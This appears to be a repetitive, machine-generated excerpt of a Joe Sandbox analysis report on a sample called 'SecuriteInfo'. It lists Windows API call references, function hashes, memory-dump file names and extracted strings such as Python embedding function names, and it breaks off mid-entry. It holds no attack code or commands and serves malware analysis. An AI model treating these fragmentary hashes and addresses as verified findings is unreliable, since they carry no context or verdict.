                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                    • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction ID: ddf51081c67b943464c89e5e1c38c6015651a196fc8e1ce876ce878806332cab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691EB32F0A65245F752BF6D944027EA7A0BB667C4F944139DF0E57AA8EF78D482C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                    • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction ID: ad79662c188449106420c7160dcfa43e40c403a8dd79396cade1bcf8527360e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513732F0611186EB15FF6C88556BEA761AF26358F90023ADF1D52BF9EF78A402C310
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                    • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                    • Instruction ID: 853517c2819e6cc1d8386f0a17bc09d206f202acd5d4a4e8436edd818eccc128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C51B122E192418AF711EF78D4407BEB7A1AB69B58F504435DF1D4B6ACEF78E440C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                     • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                    • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                    • Instruction ID: 7e6c219194974e72dfe7dbbba2802fcb42d3b7fc586f99c5f515b68bc7f8998a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741C962D2978183E755BB28951077AB260FBA5364F504334EB6C07AE9EFBCE0E0C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                    • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                    • Instruction ID: f3af564981e2a41177daec342e254dde0884ead19144a8ac99e121f9f7041497
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF313B20E0B54345EA53BB6C94292BBE291AF63344FC44534D70D872AFFEECA404C278
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                    • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                    • Instruction ID: ec933251847c1a2f97decf4bb4c984be7df18d857975e7150ae40beb6b0f92de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21D09B10B1770542EB163B7C5C5947A52555F66701F94143CCA1F5A36FFDBCA449C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction ID: a8d0da6fc7cc23490c35671d922f1718aa0cc2bb46e130e0b14c67255762ad9d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E851FF2170F24146EF66B92D540077BE191AF667A4F484A35DF6D077EDEEBCD440C620
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                    • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                    • Instruction ID: 4de386819421d88d66a667c305fdd340fcf208d6c4d4052a3c043b12b660e985
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211B96160864141DA11AB2DA41416AB361AB66FF4F944335EF7D47BEDDEBCD051C700
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B75839), ref: 00007FF7B2B75957
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B2B75839), ref: 00007FF7B2B7596D
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
• GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E04F10E0B20242FE4B7BBD984517BA2606FA6701FC44034CB0D862B9FDAC6851C730
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABC6
• GetLastError.KERNEL32(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABD0
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: 59b5ef50c0d108ecc0d47cd08d1b9d63ba2930416399e5d6fe1886c0a2f4c0a0
• Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction Fuzzy Hash: BA21FC20F0A64241FAD7776D94403BBA2925FA67A0F840239DB2E477EDEEECE440C310
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: cbeb3b5568c01fe22c816fd393b22aefbfa64644ae8ce1fe3b0dc090283c3b2e
• Instruction ID: 11e717803c3fe103e66090c19bca8d724c148768f7d4a34f0eb454ef87364c13
• Opcode Fuzzy Hash: cbeb3b5568c01fe22c816fd393b22aefbfa64644ae8ce1fe3b0dc090283c3b2e
• Instruction Fuzzy Hash: 4741D83290A24187EA75BA1DA44017EF360EB67B50F940131DB8E476EDEFACE402CF60
APIs
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 34b4addda2765862907a3b81e979866922c1056fd338e6a2004f4fdcbc6c49b5
• Instruction ID: c7b40a920e8ba4471ae5cea794db5af0772afda13ad2f2975ca09efdb3ec48fd
• Opcode Fuzzy Hash: 34b4addda2765862907a3b81e979866922c1056fd338e6a2004f4fdcbc6c49b5
• Instruction Fuzzy Hash: A621B421B1A65146FE12BA2A64043BBE651BF56BC4FC85D31EF0C4B78AEEBDE045C314
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction ID: 334d9ec49b9f0bec4668ba8a6a20c87f2549fad78403424e4908ab5d3a087571
• Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
• Instruction Fuzzy Hash: 2231B422A1961185F6577B5D844037EB660AF62B61FC10135EB2D073FAEEFCA441CB31
APIs
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
• Instruction ID: f56cbef254075cacb59bf2bfae12ff5dbf098cdb6a0b6e40a100ed84839563cb
• Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
• Instruction Fuzzy Hash: 2A21D172A06B4589FB22AF6CC0802ED33A0FB15718F840636D76C06BE9EFB8D544C750
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF7B2B7B32A,?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A), ref: 00007FF7B2B7EBED
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7B2B70C90,?,?,?,00007FF7B2B722FA,?,?,?,?,?,00007FF7B2B73AE9), ref: 00007FF7B2B7D63A
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4292702814-0
APIs
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65840
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65852
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65889
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6589B
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658B4
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658C6
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658DF
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658F1
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6590D
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6591F
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6593B
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6594D
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65969
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6597B
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65997
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659A9
• GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659C5
• GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                    • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                    • Instruction ID: bbd655453336a66547e5bc006f66ef3d1000e4163d73a65bd08ad38ee6804c87
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C319232609B8185DB61DF28E8442AFB3A4FB99754F940139EB8D47B69EF7CC145CB10
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                    • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
